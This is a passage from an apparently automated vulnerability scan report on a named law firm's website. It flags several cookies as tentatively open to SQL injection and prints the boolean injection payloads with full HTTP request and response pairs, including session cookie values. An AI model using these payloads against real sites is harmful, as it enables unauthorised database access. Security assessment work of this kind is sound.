       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.70. http://www.pillsburylaw.com/index.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 21004035'%20or%201%3d1--%20 and 21004035'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman21004035'%20or%201%3d1--%20; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:45:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman21004035'%20or%201%3d2--%20; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.71. http://www.pillsburylaw.com/index.cfm [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 18408764'%20or%201%3d1--%20 and 18408764'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4618408764'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:45:53 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4618408764'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.72. http://www.pillsburylaw.com/index.cfm [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 63424578'%20or%201%3d1--%20 and 63424578'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A0163424578'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:45:16 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A0163424578'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.73. http://www.pillsburylaw.com/index.cfm [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 14004939'%20or%201%3d1--%20 and 14004939'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee514004939'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:45:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee514004939'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.74. http://www.pillsburylaw.com/index.cfm [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 12467860'%20or%201%3d1--%20 and 12467860'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee512467860'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:45:29 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee512467860'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
